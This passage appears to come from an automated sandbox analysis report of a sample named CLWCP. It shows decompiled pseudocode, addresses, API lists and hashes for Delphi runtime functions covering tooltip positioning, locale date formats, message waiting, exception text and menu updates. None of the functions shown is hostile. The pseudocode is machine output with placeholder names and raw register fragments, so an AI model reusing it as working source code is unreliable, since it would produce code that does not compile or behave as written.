						_v97 = E00435DE4( *((intOrPtr*)( *_t250 + 0x60)), 0, 0xb030,  &_v72) == 0;
						if(_v97 != 0 &&  *((short*)( *_t250 + 0x15a)) != 0) {
							_t251 =  &_v97;
							 *((intOrPtr*)( *_t250 + 0x158))( &_v72);
						}
						if(_v97 == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0) {
							_t194 = 0;
						} else {
							_t194 = 1;
						}
						_t268 =  *_t250;
						 *((char*)( *_t250 + 0x58)) = _t194;
						if( *((char*)( *_t250 + 0x58)) == 0) {
							goto L23;
						} else {
							_t323 = _v16;
							if(_v16 == 0) {
								goto L23;
							}
							E0045742C(_v68, _t268, _t309);
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0x74))();
							_t83 =  &_v12; // 0x457222
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xe4))( &_v113,  *_t83);
							OffsetRect( &_v113, _v64, _v60);
							if(E00403594( *((intOrPtr*)( *_t250 + 0x84)), _t323) != 0) {
								_t238 = E0045748C(_v16, _t250, _t298, 0xffc8, _t309) + 5;
								_v113.left = _v113.left - _t238;
								_v113.right = _v113.right - _t238;
							}
							E004346A4( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v48);
							_t218 =  *_t250;
							 *((intOrPtr*)(_t218 + 0x64)) = _v140;
							 *((intOrPtr*)(_t218 + 0x68)) = _v136;
							E004346A4( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &(_v48.right));
							_t222 =  *_t250;
							 *((intOrPtr*)(_t222 + 0x6c)) = _v140;
							 *((intOrPtr*)(_t222 + 0x70)) = _v136;
							E00434D24( *((intOrPtr*)( *_t250 + 0x84)), _v52);
							_t114 =  &_v12; // 0x457222
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xe0))( *_t114);
							E0045482C(_v16);
							_t231 = _v24;
							if(_v24 <= 0) {
								E00457064( *_t250, 1, _v20);
							} else {
								E00457064( *_t250, 0, _t231);
							}
							L26:
							_pop(_t269);
							 *[fs:eax] = _t269;
							_push(E004578CA);
							E00404140( &_v148, 2);
							_t271 =  *0x44c2e4; // 0x44c2e8
							return E00404B58( &_v72, _t271);
						}
					}
				}
			}













































                                  0x0045753d
                                  0x00457545
                                  0x00457546
                                  0x00457547
                                  0x00457548
                                  0x0045754a
                                  0x00457550
                                  0x0045755b
                                  0x0045755c
                                  0x0045755d
                                  0x00457563
                                  0x00457569
                                  0x0045756e
                                  0x00457573
                                  0x00457574
                                  0x00457579
                                  0x0045757c
                                  0x00457581
                                  0x00457587
                                  0x00457593
                                  0x0045787c
                                  0x0045787c
                                  0x0045787f
                                  0x00457881
                                  0x00457892
                                  0x00457883
                                  0x00457889
                                  0x00457889
                                  0x00000000
                                  0x004575b2
                                  0x004575bc
                                  0x004575c1
                                  0x004575c6
                                  0x00000000
                                  0x004575cc
                                  0x004575d1
                                  0x004575d7
                                  0x004575dd
                                  0x004575e5
                                  0x004575f2
                                  0x004575fa
                                  0x00457605
                                  0x0045760d
                                  0x00457610
                                  0x00457611
                                  0x00457612
                                  0x00457613
                                  0x0045761e
                                  0x00457623
                                  0x00457628
                                  0x00457630
                                  0x00457633
                                  0x00457635
                                  0x00457645
                                  0x0045764a
                                  0x00457650
                                  0x00457655
                                  0x00457657
                                  0x00457659
                                  0x00457660
                                  0x0045766d
                                  0x0045766d
                                  0x00457660
                                  0x00457637
                                  0x0045763e
                                  0x0045763e
                                  0x00457684
                                  0x00457697
                                  0x004576a2
                                  0x004576ab
                                  0x004576b9
                                  0x004576ca
                                  0x004576d8
                                  0x004576e2
                                  0x004576e5
                                  0x004576ea
                                  0x004576ef
                                  0x004576fb
                                  0x00457709
                                  0x00457711
                                  0x00457723
                                  0x00457731
                                  0x00457731
                                  0x0045773b
                                  0x00457745
                                  0x00457749
                                  0x00457749
                                  0x00457749
                                  0x0045774b
                                  0x0045774d
                                  0x00457756
                                  0x00000000
                                  0x0045775c
                                  0x0045775c
                                  0x00457760
                                  0x00000000
                                  0x00000000
                                  0x0045776a
                                  0x00457783
                                  0x00457786
                                  0x0045779e
                                  0x004577b0
                                  0x004577c8
                                  0x004577d4
                                  0x004577d7
                                  0x004577da
                                  0x004577da
                                  0x004577eb
                                  0x004577f0
                                  0x004577f8
                                  0x00457801
                                  0x00457812
                                  0x00457817
                                  0x0045781f
                                  0x00457828
                                  0x00457836
                                  0x0045783b
                                  0x0045784f
                                  0x00457855
                                  0x0045785a
                                  0x0045785f
                                  0x00457875
                                  0x00457861
                                  0x00457867
                                  0x00457867
                                  0x00457897
                                  0x00457899
                                  0x0045789c
                                  0x0045789f
                                  0x004578af
                                  0x004578b7
                                  0x004578c2
                                  0x004578c2
                                  0x00457756
                                  0x004575c6

                                  APIs
                                    • Part of subcall function 0044C6E0: GetActiveWindow.USER32 ref: 0044C6E3
                                    • Part of subcall function 0044C6E0: GetCurrentThreadId.KERNEL32 ref: 0044C6F8
                                    • Part of subcall function 0044C6E0: 72E7AC10.USER32(00000000,0044C6C0), ref: 0044C6FE
                                    • Part of subcall function 004572D4: GetCursor.USER32(?,?,?,?,?,?,?,?,?,?,?,004575E5,00000000,004578C3), ref: 004572EF
                                    • Part of subcall function 004572D4: GetIconInfo.USER32(00000000,?), ref: 004572F5
                                  • ClientToScreen.USER32(?,?), ref: 0045766D
                                  • OffsetRect.USER32(?,?,?), ref: 00457684
                                  • OffsetRect.USER32(?,?,?), ref: 004577B0
                                    • Part of subcall function 00457064: SetTimer.USER32(00000000,00000000,00000000,00454738), ref: 0045707E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: OffsetRect$ActiveClientCurrentCursorIconInfoScreenThreadTimerWindow
                                  • String ID: "rE
                                  • API String ID: 3022406661-3744982519
                                  • Opcode ID: aec4732f204dcce991d1f06f3d3e5def4ae9b1fe246b9ec297da4d733dbcfc19
                                  • Instruction ID: dd17ed27896ebb43cb2b21dba9587b5cf66c6411717cce3b84c2ae32d6c98369
                                  • Opcode Fuzzy Hash: aec4732f204dcce991d1f06f3d3e5def4ae9b1fe246b9ec297da4d733dbcfc19
                                  • Instruction Fuzzy Hash: 6CC1F835A006188FCB10EFA9D884B8EB7F5BF49304F1181A6E905EB366DB34AD49CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B3A4, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 81%
                                  			E0040B3A4(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t45;
				void* _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				void* _t83;
				void* _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40b574);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E0040411C(__edx);
				E0040B068(GetThreadLocale(), 0x40b58c, 0x1009,  &_v12);
				if(E004081CC(0x40b58c, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						__eflags = _t92 - E004043DC(_t124);
						if(__eflags > 0) {
							goto L28;
						}
						asm("bt [0x46e10c], eax");
						if(__eflags >= 0) {
							_t45 = E004089D8(_t124 + _t92 - 1, 2, 0x40b590);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E004089D8(_t124 + _t92 - 1, 4, 0x40b5a0);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E004089D8(_t124 + _t92 - 1, 2, 0x40b5b8);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E004043E4(_t122, 0x40b5d0);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404304();
												E004043E4(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E004043E4(_t122, 0x40b5c4);
										_t92 = _t92 + 1;
									}
								} else {
									E004043E4(_t122, 0x40b5b0);
									_t92 = _t92 + 3;
								}
							} else {
								E004043E4(_t122, 0x40b59c);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040C410(_t124, _t92);
							E0040463C(_t124, _v8, _t92,  &_v20);
							E004043E4(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x470748; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00404170(_t122, _t124);
					} else {
						while(_t92 <= E004043DC(_t124)) {
							_t83 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404304();
									E004043E4(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040B57B);
				return E00404140( &_v24, 4);
			}






















                                  0x0040b3a4
                                  0x0040b3a9
                                  0x0040b3aa
                                  0x0040b3ab
                                  0x0040b3ac
                                  0x0040b3ad
                                  0x0040b3b1
                                  0x0040b3b3
                                  0x0040b3b7
                                  0x0040b3b8
                                  0x0040b3bd
                                  0x0040b3c0
                                  0x0040b3c3
                                  0x0040b3ca
                                  0x0040b3e2
                                  0x0040b3fa
                                  0x0040b54a
                                  0x0040b551
                                  0x0040b553
                                  0x00000000
                                  0x00000000
                                  0x0040b469
                                  0x0040b470
                                  0x0040b4ae
                                  0x0040b4b3
                                  0x0040b4b5
                                  0x0040b4d7
                                  0x0040b4dc
                                  0x0040b4de
                                  0x0040b4ff
                                  0x0040b504
                                  0x0040b506
                                  0x0040b51c
                                  0x0040b51c
                                  0x0040b51e
                                  0x0040b524
                                  0x0040b52b
                                  0x0040b520
                                  0x0040b520
                                  0x0040b522
                                  0x0040b53a
                                  0x0040b544
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040b522
                                  0x0040b508
                                  0x0040b50f
                                  0x0040b514
                                  0x0040b514
                                  0x0040b4e0
                                  0x0040b4e7
                                  0x0040b4ec
                                  0x0040b4ec
                                  0x0040b4b7
                                  0x0040b4be
                                  0x0040b4c3
                                  0x0040b4c3
                                  0x0040b549
                                  0x0040b549
                                  0x0040b472
                                  0x0040b47b
                                  0x0040b489
                                  0x0040b493
                                  0x0040b498
                                  0x0040b498
                                  0x0040b470
                                  0x0040b400
                                  0x0040b400
                                  0x0040b405
                                  0x0040b408
                                  0x0040b416
                                  0x0040b412
                                  0x0040b412
                                  0x0040b412
                                  0x0040b41a
                                  0x0040b457
                                  0x0040b41c
                                  0x0040b443
                                  0x0040b423
                                  0x0040b423
                                  0x0040b425
                                  0x0040b427
                                  0x0040b429
                                  0x0040b433
                                  0x0040b43d
                                  0x0040b43d
                                  0x0040b429
                                  0x0040b442
                                  0x0040b442
                                  0x0040b442
                                  0x0040b44e
                                  0x0040b41a
                                  0x0040b559
                                  0x0040b55b
                                  0x0040b55e
                                  0x0040b561
                                  0x0040b573

                                  APIs
                                  • GetThreadLocale.KERNEL32(?,00000000,0040B574,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040B3D3
                                    • Part of subcall function 0040B068: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B086
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Locale$InfoThread
                                  • String ID: eeee$ggg$yyyy
                                  • API String ID: 4232894706-1253427255
                                  • Opcode ID: 7d2df3939ca600c305348b3281ff63fb69253ec739afeb2b67f8d36bf37782ab
                                  • Instruction ID: 6ffbbef1c35fb081ea97715ea54a64dc0e1f942ee66854511e94466860814560
                                  • Opcode Fuzzy Hash: 7d2df3939ca600c305348b3281ff63fb69253ec739afeb2b67f8d36bf37782ab
                                  • Instruction Fuzzy Hash: 574125B07001159BC701A6AB8C9267FB295DB9530CB60447BF941F33D6DB3CDE0286AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00456CD0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 98timethreadwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E00456CD0(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v9;
				char _v16;
				char _v20;
				intOrPtr _t39;
				long _t44;
				intOrPtr _t59;
				void* _t70;
				intOrPtr _t74;
				intOrPtr* _t75;
				intOrPtr _t76;
				void* _t82;
				void* _t83;
				intOrPtr _t84;

				_t80 = __esi;
				_t79 = __edi;
				_t82 = _t83;
				_t84 = _t83 + 0xfffffff0;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 = 0;
				_v20 = 0;
				_v8 = __eax;
				_push(_t82);
				_push(0x456e1d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				_t4 =  &_v8; // 0x45626c
				_t63 = E00456BF0( *_t4);
				_t5 =  &_v8; // 0x45626c
				if( *((char*)( *_t5 + 0x88)) != 0) {
					_t7 =  &_v8; // 0x45626c
					_t59 =  *_t7;
					_t87 =  *((intOrPtr*)(_t59 + 0x48));
					if( *((intOrPtr*)(_t59 + 0x48)) == 0) {
						_t9 =  &_v8; // 0x45626c
						E0045729C( *_t9, 0, _t70);
					}
				}
				E004546E0(_t63,  &_v20);
				E00431B28(_v20, 0,  &_v16, _t87);
				_t39 =  *0x470b40; // 0x0
				E00456ECC(_t39, _v16, _t87);
				_v9 = 1;
				_push(_t82);
				_push(0x456dc4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				_t15 =  &_v8; // 0x45626c
				if( *((short*)( *_t15 + 0x12a)) != 0) {
					_t18 =  &_v8; // 0x45626c
					_t63 =  *_t18;
					 *((intOrPtr*)( *_t18 + 0x128))();
				}
				if(_v9 != 0) {
					_t23 =  &_v8; // 0x45626c
					_t63 =  *( *_t23 + 0xc0);
					if(_t63 > 0) {
						__eflags =  *0x470b60;
						if( *0x470b60 == 0) {
							 *0x470b60 = SetTimer(0, 0, _t63, E00456C68);
							__eflags =  *0x470b60;
							if( *0x470b60 == 0) {
								E00456B8C();
							}
						}
					} else {
						E00456B8C();
					}
				}
				_pop(_t74);
				 *[fs:eax] = _t74;
				_t44 = GetCurrentThreadId();
				_t75 =  *0x46fdc4; // 0x470030
				if(_t44 ==  *_t75 && E0041990C(0, _t63, _t79, _t80) != 0) {
					_v9 = 0;
				}
				if(_v9 != 0) {
					WaitMessage();
				}
				_pop(_t76);
				 *[fs:eax] = _t76;
				_push(E00456E24);
				return E00404140( &_v20, 2);
			}

















                                  0x00456cd0
                                  0x00456cd0
                                  0x00456cd1
                                  0x00456cd3
                                  0x00456cd6
                                  0x00456cd7
                                  0x00456cd8
                                  0x00456cdb
                                  0x00456cde
                                  0x00456ce1
                                  0x00456ce6
                                  0x00456ce7
                                  0x00456cec
                                  0x00456cef
                                  0x00456cf2
                                  0x00456cfa
                                  0x00456cfc
                                  0x00456d06
                                  0x00456d08
                                  0x00456d08
                                  0x00456d0b
                                  0x00456d0f
                                  0x00456d11
                                  0x00456d14
                                  0x00456d14
                                  0x00456d0f
                                  0x00456d1e
                                  0x00456d29
                                  0x00456d31
                                  0x00456d36
                                  0x00456d3b
                                  0x00456d41
                                  0x00456d42
                                  0x00456d47
                                  0x00456d4a
                                  0x00456d4d
                                  0x00456d58
                                  0x00456d5d
                                  0x00456d5d
                                  0x00456d69
                                  0x00456d69
                                  0x00456d73
                                  0x00456d75
                                  0x00456d78
                                  0x00456d80
                                  0x00456d8c
                                  0x00456d93
                                  0x00456da4
                                  0x00456da9
                                  0x00456db0
                                  0x00456db5
                                  0x00456db5
                                  0x00456db0
                                  0x00456d82
                                  0x00456d85
                                  0x00456d85
                                  0x00456d80
                                  0x00456dbc
                                  0x00456dbf
                                  0x00456dd9
                                  0x00456dde
                                  0x00456de6
                                  0x00456df3
                                  0x00456df3
                                  0x00456dfb
                                  0x00456dfd
                                  0x00456dfd
                                  0x00456e04
                                  0x00456e07
                                  0x00456e0a
                                  0x00456e1c

                                  APIs
                                    • Part of subcall function 00456BF0: GetCursorPos.USER32 ref: 00456BF9
                                  • SetTimer.USER32(00000000,00000000,?,00456C68), ref: 00456D9F
                                  • GetCurrentThreadId.KERNEL32 ref: 00456DD9
                                  • WaitMessage.USER32(00000000,00456E1D,?,?,?,0046D588), ref: 00456DFD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CurrentCursorMessageThreadTimerWait
                                  • String ID: lbE
                                  • API String ID: 3909455694-4025571180
                                  • Opcode ID: fc7e9a840fdedb78e7883b13347f93155f4f8955f78323940c8e0ec33ad1f669
                                  • Instruction ID: 119c749b4d2774bbfa04347197884841368fee2bb2749aac63ce38faf7a0f5e9
                                  • Opcode Fuzzy Hash: fc7e9a840fdedb78e7883b13347f93155f4f8955f78323940c8e0ec33ad1f669
                                  • Instruction Fuzzy Hash: 04419330A04208EFDB10DB65D856B9EB7F5EB05309F9644BAE80497392D7786E4CCB18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BC3E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E0040BC3E(void* __ebx, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t100;
				void* _t107;
				intOrPtr _t109;
				void* _t112;

				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t112);
				_push(0x40bdfb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t112 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x46fc58; // 0x406dec
					E00405C70(_t52,  &_v8);
				} else {
					_t86 =  *0x46fdcc; // 0x406de4
					E00405C70(_t86,  &_v8);
				}
				_t109 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t109;
					_v348 = 5;
					_t60 =  *0x46fc64; // 0x406d94
					E00405C70(_t60,  &_v372);
					E0040B86C(_t89, _v372, 1, _t107, _t109, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E0040438C( &_v340, 0x105,  &_v297);
					E004087A8(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t109;
					_v304 = 5;
					_t82 =  *0x46fcd0; // 0x406e8c
					E00405C70(_t82,  &_v344);
					E0040B86C(_t89, _v344, 1, _t107, _t109, 3,  &_v332);
				}
				_pop(_t100);
				 *[fs:eax] = _t100;
				_push(E0040BE02);
				E0040411C( &_v372);
				E00404140( &_v344, 3);
				return E0040411C( &_v8);
			}

































                                  0x0040bc4d
                                  0x0040bc53
                                  0x0040bc59
                                  0x0040bc5f
                                  0x0040bc65
                                  0x0040bc6a
                                  0x0040bc6b
                                  0x0040bc70
                                  0x0040bc73
                                  0x0040bc79
                                  0x0040bc80
                                  0x0040bc94
                                  0x0040bc99
                                  0x0040bc82
                                  0x0040bc85
                                  0x0040bc8a
                                  0x0040bc8a
                                  0x0040bc9e
                                  0x0040bcab
                                  0x0040bcb7
                                  0x0040bd73
                                  0x0040bd79
                                  0x0040bd83
                                  0x0040bd89
                                  0x0040bd90
                                  0x0040bd96
                                  0x0040bdac
                                  0x0040bdb1
                                  0x0040bdc3
                                  0x0040bcda
                                  0x0040bcdd
                                  0x0040bce3
                                  0x0040bcfb
                                  0x0040bd0c
                                  0x0040bd17
                                  0x0040bd1d
                                  0x0040bd27
                                  0x0040bd2d
                                  0x0040bd34
                                  0x0040bd3a
                                  0x0040bd50
                                  0x0040bd55
                                  0x0040bd67
                                  0x0040bd6c
                                  0x0040bdcc
                                  0x0040bdcf
                                  0x0040bdd2
                                  0x0040bddd
                                  0x0040bded
                                  0x0040bdfa

                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040BDFB), ref: 0040BCAB
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040BDFB), ref: 0040BCCD
                                    • Part of subcall function 00405C70: LoadStringA.USER32 ref: 00405CA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileLoadModuleNameQueryStringVirtual
                                  • String ID: <w@$m@
                                  • API String ID: 902310565-3560159811
                                  • Opcode ID: 7e32b2dba680f9ee8f9f5a057de95c60de42d1180f887a44240fab25573176b1
                                  • Instruction ID: 262b7cc9331fbf0f530a7c7c2ddf87ea5ca86dfae7e1aef43231c14f7292f596
                                  • Opcode Fuzzy Hash: 7e32b2dba680f9ee8f9f5a057de95c60de42d1180f887a44240fab25573176b1
                                  • Instruction Fuzzy Hash: 0831FB70904618DFDB61DF65CC85BD9B7F8EB48304F4040EAE908AB291D7789E848F99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00448EE8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E00448EE8(intOrPtr* __eax) {
				struct tagMENUITEMINFOA _v128;
				intOrPtr _v132;
				int _t16;
				intOrPtr* _t29;
				struct HMENU__* _t36;
				MENUITEMINFOA* _t37;

				_t37 =  &_v128;
				_t29 = __eax;
				_t16 =  *0x46fdc8; // 0x470744
				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
					_t37->cbSize = 0x2c;
					_v132 = 0x10;
					_v128.hbmpUnchecked =  &(_v128.cch);
					_v128.dwItemData = 0x50;
					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
					if(_t16 != 0) {
						_t16 = E0044927C(_t29);
						asm("sbb edx, edx");
						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
							_v128.cbSize = ((E0044927C(_t29) & 0x0000007f) << 0x0000000d) + ((E0044927C(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
							_v132 = 0x10;
							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
							if(_t16 != 0) {
								return DrawMenuBar( *(_t29 + 0x38));
							}
						}
					}
				}
				return _t16;
			}









                                  0x00448eea
                                  0x00448eed
                                  0x00448eef
                                  0x00448ef8
                                  0x00448f0f
                                  0x00448f11
                                  0x00448f18
                                  0x00448f24
                                  0x00448f28
                                  0x00448f36
                                  0x00448f3d
                                  0x00448f41
                                  0x00448f53
                                  0x00448f58
                                  0x00448f76
                                  0x00448f7a
                                  0x00448f88
                                  0x00448f8f
                                  0x00000000
                                  0x00448f95
                                  0x00448f8f
                                  0x00448f58
                                  0x00448f3d
                                  0x00448fa2

                                  APIs
                                  • GetMenuItemInfoA.USER32 ref: 00448F36
                                  • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 00448F88
                                  • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 00448F95
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Menu$InfoItem$Draw
                                  • String ID: P
                                  • API String ID: 3227129158-3110715001
                                  • Opcode ID: e13710c0ff2b4aac6747bad2ba151a54afda6a5b37ea2b1952b90fb9b566bd0d
                                  • Instruction ID: 53b5d008a907d500d3d270b8b4b21312fbdd0c10407895a96187f0233fda2378
                                  • Opcode Fuzzy Hash: e13710c0ff2b4aac6747bad2ba151a54afda6a5b37ea2b1952b90fb9b566bd0d
                                  • Instruction Fuzzy Hash: CA11BF70205201AFE710DB28CC81B4B77D5AB84358F148A6EF195DB3E5DB79C888C74A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EBBC, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E0040EBBC(signed short* __eax, void* __ecx) {
				void* _t7;
				signed short _t18;
				intOrPtr* _t19;

				_t12 = __eax;
				_t18 =  *__eax & 0x0000ffff;
				if(_t18 >= 0x14) {
					if(_t18 != 0x100) {
						if(_t18 != 0x101) {
							if((_t18 & 0x00002000) == 0) {
								_t7 = E00410618(_t18, _t19);
								if(_t7 == 0) {
									L0040D6B4();
									L0040D6AC();
								} else {
									_t7 =  *((intOrPtr*)( *((intOrPtr*)( *_t19)) + 0x24))();
								}
							} else {
								_t7 = E0040EA40(__eax);
							}
						} else {
							_t7 =  *0x470814();
						}
					} else {
						 *__eax = 0;
						_t7 = E0040411C( &(__eax[4]));
					}
				} else {
					_push(__eax);
					L0040D6B4();
					_t7 = E0040E90C(__eax);
				}
				return _t7;
			}






                                  0x0040ebbf
                                  0x0040ebc1
                                  0x0040ebc8
                                  0x0040ebdc
                                  0x0040ebf2
                                  0x0040ec03
                                  0x0040ec12
                                  0x0040ec19
                                  0x0040ec28
                                  0x0040ec2e
                                  0x0040ec1b
                                  0x0040ec22
                                  0x0040ec22
                                  0x0040ec05
                                  0x0040ec07
                                  0x0040ec07
                                  0x0040ebf4
                                  0x0040ebf6
                                  0x0040ebf6
                                  0x0040ebde
                                  0x0040ebde
                                  0x0040ebe6
                                  0x0040ebe6
                                  0x0040ebca
                                  0x0040ebca
                                  0x0040ebcb
                                  0x0040ebd0
                                  0x0040ebd0
                                  0x0040ec36

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ClearVariant
                                  • String ID: t@
